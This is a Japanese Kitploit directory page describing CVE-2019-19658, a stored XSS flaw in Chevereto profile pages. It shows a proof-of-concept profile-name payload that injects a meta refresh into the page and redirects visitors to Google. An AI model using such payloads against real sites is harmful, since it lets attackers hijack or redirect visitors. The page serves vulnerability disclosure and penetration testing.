Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2019-19658 — Chevereto プロフィールページにおける格納型XSS - 1.0.0 - 1.1.4 Free, <= 3.13.5 Core | Kitploit
ツール/GitHubGitHub/jra89/cve-2019-19658
脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテスト
GitHubjra89/cve-2019-19658

CVE-2019-19658

Chevereto プロフィールページにおける格納型XSS - 1.0.0 - 1.1.4 Free, <= 3.13.5 Core

リポジトリを見る
16年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2019-19658

Chevereto のプロフィールページにおけるストアドXSS - 1.0.0 - 1.1.4 Free、<= 3.13.5 Core。一般ユーザーがプロフィール名にHTMLやスクリプトを入力でき、それがプロフィールページ上で実行されます。

root@kitploit:~
/settings/profile

名前:

root@kitploit:~
0;https://www.google.se" http-equiv="refresh" data="

プロフィールページでの結果(Googleにリダイレクトされます):

root@kitploit:~
<meta name="twitter:title" content="0;https://www.google.com" http-equiv="refresh" data=" (admin)">



登録済みユーザーが名前フィールドにスクリプト(この例ではユーザーをGoogleにリダイレクトするもの)を挿入します



誰かが/testのプロフィールにアクセスすると、リダイレクトされます

ツールをダウンロード